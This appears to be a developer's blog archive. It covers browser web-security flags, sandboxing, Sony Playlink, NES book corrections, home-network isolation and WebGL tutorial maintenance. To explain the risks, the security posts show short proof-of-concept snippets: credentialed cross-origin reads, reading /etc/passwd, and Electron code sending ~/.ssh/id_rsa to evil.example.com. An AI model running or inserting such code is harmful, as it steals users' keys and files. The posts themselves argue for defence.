Don’t disable web security!!!

This basic question comes up all over Stack Overflow.

People ask how they can access files when developing HTML locally. They make an .html file, then open it in Chrome. They add a script that needs to access an image for canvas or WebGL or whatever, and find they can’t. So they ask on Stack Overflow, and the most common answer is some form of “Start Chrome with the option --disable-web-security” (or one of 5 or 6 other similar flags).

I keep screaming DON’T DO THAT! but almost no one listens. In fact, not only do they not listen, they downvote my answers.

Well, here are two proofs of concept showing why it’s ill-advised to disable web security.

The first one is an example that will grab your Stack Overflow or GitHub username if you are logged in and you started Chrome with --disable-web-security. Of course you probably don’t care that someone is looking up your username on various sites, but that’s not really the point. The point is that some webpage unrelated to those sites was able to access data from those sites. The same webpage could access any other site: your bank, your Google account, all because you disabled security.
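At its core the trick is nothing more than a cross-origin request, something the browser would normally block. A minimal sketch of the idea (the real proof of concept also parses the response to pull out your username):

// with --disable-web-security the browser no longer enforces the
// same-origin policy, so any page can read any other site as you
fetch('https://stackoverflow.com/', { credentials: 'include' })
  .then(response => response.text())
  .then(html => {
    // this HTML was rendered for you, logged in, so it
    // contains your account details
    console.log(html);
  });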

You might say “I’d never run a script like that” but you likely run lots of third-party scripts.

The second example will show files from your hard drive. It could upload them to a remote server. Which files some baddie would want I have no idea. The point is not to show uploading dangerous files. The point is only to show that if you disable web security it’s possible for a script, your own or a third-party one, to access your local files.
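That one boils down to something like this sketch of the idea (not the exact proof of concept; with security disabled a page can read file:// URLs it could never normally touch):

// a plain XMLHttpRequest for a local file, which is normally forbidden
const xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd');  // any path would do
xhr.onload = () => {
  // nothing stops this from being POSTed to a remote server
  console.log(xhr.responseText);
};
xhr.send();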

Many of you will be thinking “I’d never do either of those” but I think that’s being short-sighted. I know I often forget which browser I’m in, the dev one or the non-dev one. If I mistakenly used the dev one with web security disabled, then oops.

Of course you might also be thinking you’d never do any of the things above. You’re running your own hand-coded webpages with scripts, not using any 3rd party libraries, and you never use the wrong browser. But again, that’s not the point. The point is you turned off security. The point is not to enumerate all the ways you might get hacked or have data stolen or accounts manipulated. The point is that if you disable web security you’ve made yourself more vulnerable, period.

This is especially frustrating because the better solution is so simple: just run a simple local server! It will take you all of 2 minutes at most. Here’s one I wrote for those people not comfortable with the command line. Here are also 6 or 7 others.
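If you are comfortable with the command line, either of these serves the current folder (assuming you have Node.js or Python installed; http-server is just one of many such packages):

npx http-server
# or
python -m http.server

Then open the URL it prints (something like http://localhost:8080) and everything works, with web security fully enabled.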

Sony Playlink

So Sony announced Playlink at E3 this year (2017).

It’s a little frustrating. It’s basically HappyFunTimes.

The part that’s frustrating is that in that video Shuhei Yoshida is happily playing a Playlink game, and yet about a year ago I saw Shuhei Yoshida at a BitSummit 2016 party and showed him a video of happyfuntimes. He told me using phones as a controller was a stupid idea. His objection was that phone controls are too mushy and laggy. He didn’t have the foresight to see that not all games need precise controls to be fun. And yet here he is a year later playing Playlink, which is the same thing as happyfuntimes.

In 2014 I also showed Konou Tsutomu happyfuntimes at a party and even suggested a “Playstation Party” channel with games for more than 4 players using the system. My hope was maybe he’d get excited about it and bring it up at Sony but he seemed uninterested.

Some people don’t see the similarity, but I’d like to point out:

  • There are happyfuntimes games where you draw on the phone
  • There are happyfuntimes games where you use a virtual dpad
  • There are happyfuntimes games where you tilt and orient the phone like a Wiimote
  • There are happyfuntimes games where you set the phone on the table and spin it
  • There are happyfuntimes games where you’re given various menus of choices
  • There are happyfuntimes games that take live video from the phone and display it in the game
  • There are happyfuntimes games that use the phone like Google Cardboard, multiple people looking in shared VR
  • There are happyfuntimes games that play sounds from the phone
  • There are happyfuntimes games with asymmetric controls where
    • One player is the driver (uses phone like Wii MarioKart Wiimote)
    • One player is the navigator (the map is only on their phone, so they have to direct the driver)
    • Two players are chefs making pizzas, pretending phones are boxes of ingredients

And many others.

And of course there are also games you could not easily play on PS4 like this giant game where players control bunnies or this game using 6 screens.

As for Shuhei’s objection that the controls are not precise enough:

You just have to design the right games. Happyfuntimes would not be any good for Street Fighter, but that doesn’t mean there isn’t still an infinite variety of games it would be good for.

In any case I’m not upset about it. I doubt that Shuhei had much to do with Playlink directly, and I doubt Konou even brought it up at Sony. I think the basic idea is actually a pretty obvious one. Mostly it just reinforces something I already knew: that pitching and negotiation skills are incredibly important. If I had really wanted happyfuntimes to become PS4 Playlink I should have pitched it much harder and more officially than showing it casually at a party to gauge interest. It’s only slightly annoying to have been shot down by the same guy that announced their own version of the same thing. 😜

In any case, if you want to experiment with games that support lots of players happyfuntimes is still a free and open source project available for Unity and/or HTML5/Electron. I’d love to see and play your games!

Wishing for more Sandboxes

I’m starting to wish that nearly all desktop apps ran in a very tight sandbox the same way they do on iOS.

Windows is trying to do this with the Windows Store and Apple is trying to do it with the Mac App Store. The problem is twofold. One is that they started with unsandboxed systems and so have decades of legacy software that expects to be unsandboxed. The other is that they’ve conflated sandboxes and their app stores. Those 2 things should be separated.

Apps like Photoshop, Lightroom, Microsoft Word, GIMP, Blender, Maya, etc. should not need system-wide access.

To be clear I am **NOT** suggesting that there should be an app store or that there should be an approval process for apps. Rather I’m suggesting that the OS should default to running each app in a sandbox, with that app unable to get outside its sandbox without user permission. The permission system should be designed well (like I think it mostly is on iOS), so a native app should not be able to access your entire hard drive by default. It should not be able to read files from other apps by default. It should not be able to use your camera or mic or get GPS info by default. It should not be able to show notifications or read your contacts by default. All of those things should be requested of the user at use time, like iOS does (and I think Android is in the process of doing).

This might seem unrelated, but it came up recently when a user on Stack Overflow asked how to make an Electron app from their HTML5 WebGL game. There are a few steps, but overall it’s pretty easy. If you’re not familiar with Electron, it’s basically a version of Chrome that you can bundle as an app with your own HTML/CSS/JavaScript, but unlike a normal webpage your JavaScript can access native features like files, OS-level menus, OS-level networking, etc.

And therein lies the issue. It’s common to use third-party scripts in your HTML5 apps. Maybe you’re including jQuery or Three.js from a CDN. Maybe, like many mobile apps, you’re downloading your HTML/CSS/JavaScript from your own servers like myautoupdatingapp.com. By doing that you’ve just made it possible for the people controlling the CDN, anyone who hacks your server, or the people who buy your domain to own every machine that’s running your app. This is something that’s not true with a browser doing the same thing, because the browser does not allow JavaScript to access all those native things. It’s only Electron that does this.
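To make that concrete, here’s a minimal sketch of what any script on the page can do in an Electron renderer with node integration enabled (historically the default); a third-party script from a CDN runs with exactly the same power:

// any script on the page, including one loaded from a CDN,
// can require Node modules and read arbitrary files...
const fs = require('fs');
const os = require('os');
const secrets = fs.readFileSync(os.homedir() + '/.ssh/id_rsa', 'utf8');
// ...and ship them anywhere (the URL here is just for illustration)
fetch('https://evil.example.com/steal', { method: 'POST', body: secrets });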

This means I have to trust every developer using Electron to not do either of those things.

On the other hand, this is exactly what iOS was designed to handle. You don’t have to trust the app to the same level because the OS doesn’t let the app read and write files to the entire machine. The OS doesn’t let the app access the camera or the mic without first asking the user for permission.

This isn’t the first time this kind of thing has happened. I’m sure there are plenty of other cases. One for me is XBMC/Kodi, where there are plugins but no sandbox, which means every plugin could be hacking your system. Many of those plugins are for websites that are arguably doing questionable things, so why should I trust them not to do questionable things to my machine?

I’d even take it so far as to wish it were easier to do this in the terminal/shell. If I’m trying out a new project there is often a build step or setup step, or even the project itself. Those steps often allow code to run, code I don’t want to have to trust. Of course in those cases I could run them in a VM, and maybe I should start doing that more. I’m just wishing that it was easier than it is today. I kind of wish it was an OS-level thing. I’d type something like

mkdir test && cd test && start VM

or

mkdir test && cd test && start sandbox

Then I could

git clone someproject .
./configure
make

or

git clone somejsproj .
npm install

And not have to trust that the 1000+ contributors above weren’t doing something bad, intentionally or unintentionally.
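Today the closest easy approximation is probably a container. A sketch with Docker (assuming it’s installed; the image and repo are just examples):

docker run --rm -it -v "$PWD":/work -w /work node bash
# inside the container the code can only see /work
git clone https://github.com/example/somejsproj .
npm install

It’s not a perfect sandbox, containers still share the host kernel, but the cloned code can no longer read the rest of my home directory.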

Unfortunately, without a push by Apple and/or Microsoft, it’s unlikely the big software companies like Adobe are going to switch their apps to the sandboxed systems.

IMO both companies need to separate their sandboxes (good) from their stores (bad). They then need to make it harder to run un-sandboxed apps. Not impossible, some apps probably need system-level access if they provide system-level services. But they need to start making it the norm that apps are sandboxed.

NES/Famicom, A Visual Compendium – Corrections

A very nice book came out with images from tons of NES games called “NES/Famicom, A Visual Compendium”. I saw several of my friends had backed the Kickstarter, and when they got their copies they mentioned one of my games was in it, so I had to buy a copy.

It’s a gorgeous book. I’m not 100% sure I’m into the sharp emulator-capture graphics, as they look absolutely nothing at all like the original games. As art they’re very cool, but as representations of what those games looked like they are far off the mark. You can see a comparison in this article and see how, when blown up in an emulator, they look all blocky, but back when they came out they looked smooth. Still, as graphic art it’s cool to see them in the book.

That said, I looked up M.C. Kids and was a little disappointed to see things reported incorrectly. I’m not blaming anyone in particular. I assume it’s an issue like the game “telephone”, where as the message got passed from person to person it got re-interpreted and ended up in its present form.

For M.C. Kids it implies Rene did all the enemies, but that was not the case. I’m not sure what percentage of the enemies Rene created, but IIRC Darren Bartlett and Ron Miller both did enemies as well.

I then noticed there was an unreleased section, and sure enough Robocop vs Terminator was listed there.

It’s also wrong. It says “Graeme Devine moved me from Caesars Palace Gameboy to Robocop Vs Terminator”. What actually happened is that Graeme Devine moved me from Caesars Palace to Terminator NES, not Robocop vs Terminator. I worked on an animation tool to be shared between Terminator NES and M.C. Kids NES. Later I was asked to work on M.C. Kids, and Terminator was given to David Perry to make Terminator for Sega Genesis. When I finished M.C. Kids, and I was no longer at Virgin Games, I got a contract from Interplay to code Robocop Vs Terminator for NES.

Trying to help noobs is SOOOO FRUSTRATING!

I often wonder if I’d like to teach. It’s certainly fun to teach when the students are easy to teach, but where’s the challenge in that?

I wrote webglfundamentals.org (and webgl2fundamentals.org) and I answer tons of WebGL questions on stackoverflow but sometimes it’s sooooooooooooooo frustrating.

I’m trying to take those frustrations as an opportunity to learn how to teach better, how to present things, how to be patient, etc. but still… (more…)

After 11 years of waiting The Last Guardian has somehow lost the magic

It’s been 11 years since Shadow of the Colossus shipped for PS2. I was such a fan of Ico that, even though I sat directly next to the Shadow of the Colossus team at Sony Japan, and all I had to do was stand up and look over my cubicle’s divider to see work in progress, I made my best effort not to look because I didn’t want to spoil the experience of whatever they were making.

So now, 11 years later, the team has finally shipped their next game, skipping an entire generation of consoles.

And …. (more…)

Isolating Devices on a Home Network

Call me paranoid but I’d really like to be able to easily isolate devices on a home network.

As it is, most people have at best a single router running a single local area network. On that network they have 1 or more computers, 1 or more tablets, 1 or more phones. Then they might have 1 or more smart TVs, 1 or more game consoles. And finally, people are now starting to add Internet of Things (IoT) devices: IP webcams, network-connected door locks, lights that change color from apps, etc.

The problem is that every device, and every program running on every phone/tablet/TV/game console/computer, can hack all your other devices on the same network. That includes when friends visit and connect to your network.

So for example, here’s a demonstration of hacking into a network through network-connected lights. There’s ransomware, where your computer gets infected with a virus which encrypts all your data and then demands a ransom to un-encrypt it. The same thing is happening to smart TVs: the virus infects your TV, encrypts it so you can’t use it, and demands money to un-encrypt it. Printers can get infected too.

All of this gets easier with every app you download. You download some new app for your phone, and you have no idea whether, once it’s on your home network, it’s scanning the network for devices with known exploits to infect. Maybe it’s just hacking your router for various reasons. It could hack your DNS so that when you type “mybank.com” it actually takes you to a fake site where you type in your password and later get robbed. Conversely, you have no idea what bugs are in the app itself that might let it be exploited.

One way to possibly mitigate some of these issues would be for the router to put every device on its own network. I know of no router that can do this easily. Some routers can make virtual networks, but it’s a pain in the ass. Worse, you often want to be able to talk to other devices on your home network. For example, you’d like to tell your Chromecast to cast some video from your phone, except you can’t if they’re not on the same network. You’d like to access the webcam in your baby’s room, but you can’t if they’re not on the same network. You’d like to print, but you can’t if they’re not on the same network, etc.

So I’ve been wondering, where’s the router that fixes this issue? Let me add a device with one button that makes a LAN for that one device. Also, let me choose which other devices, and over which protocols, that new device is allowed to communicate with. All devices probably also need to use some kind of encryption, since with low-level network access an app could still probably manage to hack things.
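Pieces of this exist today. For example, hostapd, the software behind many Linux-based access points, has a client isolation option that keeps wireless clients from talking to each other at all, though that’s all-or-nothing rather than the per-device, per-protocol control I’m wishing for:

# /etc/hostapd/hostapd.conf, assuming a Linux box acting as the access point
ap_isolate=1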

I get that this would only be a solution for geeks. Maybe it could be more automated in some way. But in general there’s clearly no way you can expect all app makers and all device makers to be perfect. So the only solution seems to be isolating the devices from each other.

Any other solutions?

WebGL2Fundamentals.org and stuff

I recently made webgl2fundamentals.org. WebGL2 is backward compatible with WebGL1, which means anything you learn about WebGL1 is applicable to WebGL2, but there are a few things that made it seem like it needed a new site.

The biggest was GLSL 3.00 ES, an updated version of GLSL that’s not available in WebGL1. It adds some great features, but it’s not backward compatible, so it seemed like making all the samples use GLSL 3.00 ES was better than leaving them as is.

Another big reason is WebGL2 has Vertex Array Object support. I had not used them much in WebGL1 because they were an optional feature. After using them, though, I feel like, because it’s possible to make a polyfill, I should have used them from day 1. The machines that need the polyfill are probably also machines that don’t run WebGL well in the first place. On the other hand, I think people would be annoyed learning WebGL1 if they had to rely on a polyfill, so as it is I’ll leave the WebGL1 site not using Vertex Array Objects.
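For what it’s worth, the difference the polyfill papers over is small. A sketch of the two APIs side by side:

// WebGL1: vertex array objects come from an optional extension
const ext = gl.getExtension('OES_vertex_array_object');
const vao1 = ext && ext.createVertexArrayOES();
if (vao1) ext.bindVertexArrayOES(vao1);

// WebGL2: they are part of the core API
const vao2 = gl.createVertexArray();
gl.bindVertexArray(vao2);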

The second biggest reason is I got my math backward. Matrix multiplication is order dependent: A * B != B * A. I’ve used various 3D math libraries in the past, and I personally never noticed a convention. I’d just try A * B * C * D, and if I didn’t get the result I wanted I’d switch to D * C * B * A. So when I made the math library for WebGL1 I picked a convention based on matrix names. It’s common to have names like viewProjection and worldViewProjection, so it seemed like it would be easier to understand if

viewProjection = view * projection

and

worldViewProjection = world * view * projection

But, I’ve been convinced I was wrong. It’s actually

viewProjection = projection * view

and

worldViewProjection = projection * view * world

I won’t go into the details why, but I switched all the math on webgl2fundamentals.org to use the second style.
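In code, with the site’s m4-style library, where m4.multiply(a, b) computes a * b, the new convention looks like this sketch:

// worldViewProjection = projection * view * world
const viewProjection = m4.multiply(projection, view);
const worldViewProjection = m4.multiply(viewProjection, world);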

Anyway, that’s beside the point. The bigger issue is the pain of updating it all. There are currently over 132 samples. If I decide that all samples need to switch their math, that’s several days of work. Even if I decide something small, like all samples should clear the screen or all samples should set the viewport, it takes hours to visit each and every one and update it. Some have patterns I can search and replace for, but they’re often multi-line and a pain to regex. I wonder if there is some magic by which I could edit git history to make each change back when I made the first sample and then see that change propagate up through all the samples. Sadly, I don’t think git knows which samples were based off others, and even if it did, I’m sure it would be even more confusing figuring out where it couldn’t merge.

It’s hard to get everything right the first time, at least for me, and so as I create more and more samples and get more and more feedback, I see places where I should probably have done something different right from the start.

For example, my original goal in writing the first sample was to be as simple as possible. There are about 20 lines of boilerplate needed for any WebGL program. I originally left those out because they seemed like clutter. Who cares how a shader is compiled? All that matters is that it’s compiled and we can use it. But people complained. That’s fine. I updated the first sample to put those 20 lines in but removed them from the 2nd sample on.
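That boilerplate is roughly this kind of thing, condensed here as a sketch rather than the site’s exact code:

// compile a shader and fail loudly if it doesn't compile
function createShader(gl, type, source) {
  const shader = gl.createShader(type);
  gl.shaderSource(shader, source);
  gl.compileShader(shader);
  if (!gl.getShaderParameter(shader, gl.COMPILE_STATUS)) {
    console.error(gl.getShaderInfoLog(shader));
    gl.deleteShader(shader);
    return null;
  }
  return shader;
}
// plus a similar function that links two shaders into a program
// with gl.createProgram, gl.attachShader, and gl.linkProgram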

Another issue was I didn’t use namespaces, so there were global functions like createProgramFromScripts instead of webglUtils.createProgramFromScripts. I’m guessing, them being global, people were like “where is this from?”. I switched them. I’m hoping the prefixes make it clear, and that they’ll see the webgl-utils.js script tag at the top.

Similarly, the first sample just makes one draw call on a fixed-size 400×300 canvas. Again, to keep it as simple as possible, a ton of stuff is kind of left out. For example, setting uniforms once during initialization. If you’re only going to draw once that seems natural, but drawing only once is a huge exception, so it ends up making the sample not representative of real WebGL code. Similarly, because the canvas was a fixed size there was no reason to set the viewport. But 99% of WebGL apps have a canvas that changes size, so they need to set the viewport. Similarly, because they resize, they need to update the resolution of the canvas, but I had left both of those steps out. Yet another was using only one shader program. A normal WebGL app will have several shader programs and therefore set which shader program to use at render time, but the samples were setting it at init time since there was only one. The same goes for attributes, textures, global render states, etc. All of these things are normally set at render time, but most of the samples were setting them at init time.
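The per-frame handling most of the samples do now looks something like this sketch (the site’s actual helper lives in webgl-utils.js):

// match the canvas's resolution to the size it's displayed at
function resizeCanvasToDisplaySize(canvas) {
  const width = canvas.clientWidth;
  const height = canvas.clientHeight;
  if (canvas.width !== width || canvas.height !== height) {
    canvas.width = width;
    canvas.height = height;
  }
}

function drawScene() {
  resizeCanvasToDisplaySize(gl.canvas);
  gl.viewport(0, 0, gl.canvas.width, gl.canvas.height);
  // set the program, attributes, uniforms, textures, then draw...
}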

Anyway, I updated almost all of that on webgl2fundamentals.org. Now I’m trying to decide how much time to spend backporting to the old site, given it took easily 40-60 hours of work to make all the changes.

I recently added a code editor to the site so people can view the code easily. That’s another one of those things where, I guess having written JS-related stuff for the last 8 years, I know some of the tools. I know you can pick “view source” and/or you can open the devtools in any browser and see all the code. I also know you can go to GitHub, which is linked on every page, and see the source. That said, I got several comments from people who got lost and didn’t know how to do any of those. Should I put a link under every single sample, “click here to learn how to view source”, that leads to tutorials on view source, devtools, and GitHub? How to get a copy locally. How to run a simple web server in a few seconds to run the tutorials locally. I suppose I should write another article on all that stuff.

Well, I added the code editor for now, which I’m a tiny bit proud of. At least in Chrome and Firefox it seems to catch both JavaScript errors and WebGL errors and will put your cursor at the correct line in your source. It also displays the console messages. I got that inspiration from Stack Overflow’s snippet editor, but theirs gives the wrong line numbers. Unfortunately it’s a pretty heavy editor, but it does do IntelliSense-like help. Hopefully it will be updated to handle JSDoc soon like its big brother.
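The basic trick, sketched below, is hooking errors and the console inside the frame that runs the sample (reportToEditor is a hypothetical stand-in for the editor’s messaging code):

// forward uncaught errors along with their file and line number
window.addEventListener('error', (e) => {
  reportToEditor(e.message, e.filename, e.lineno);  // hypothetical helper
});

// wrap console.log so messages show up in the editor too
const origLog = console.log;
console.log = (...args) => {
  reportToEditor(args.join(' '));  // hypothetical helper
  origLog.apply(console, args);
};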

But that brought up new issues which I’m not sure whether I should handle or not. The original samples had a fixed size. With the code editor, though, the size can change. I updated all the samples to handle that, but it’s not perfect. Most real WebGL apps handle this case. Should I clutter the code in all the samples to handle it? All the animated samples handle it, but non-animated samples don’t. For some of those samples it would basically just be one line:

window.addEventListener('resize', drawScene);

But of course it’s not that simple. Many samples are designed to draw only once, period, and would have to be re-written to even have a drawScene function.

I’m not sure what my point was in writing this except to say that it’s a new experience. Normally I work on one program for N months. If I decide I need to refactor it, I refactor it. But for these tutorials I’m effectively working on 132+ tiny programs. If I decide I need to refactor, I have to refactor all 132+ of them and all the articles that reference them.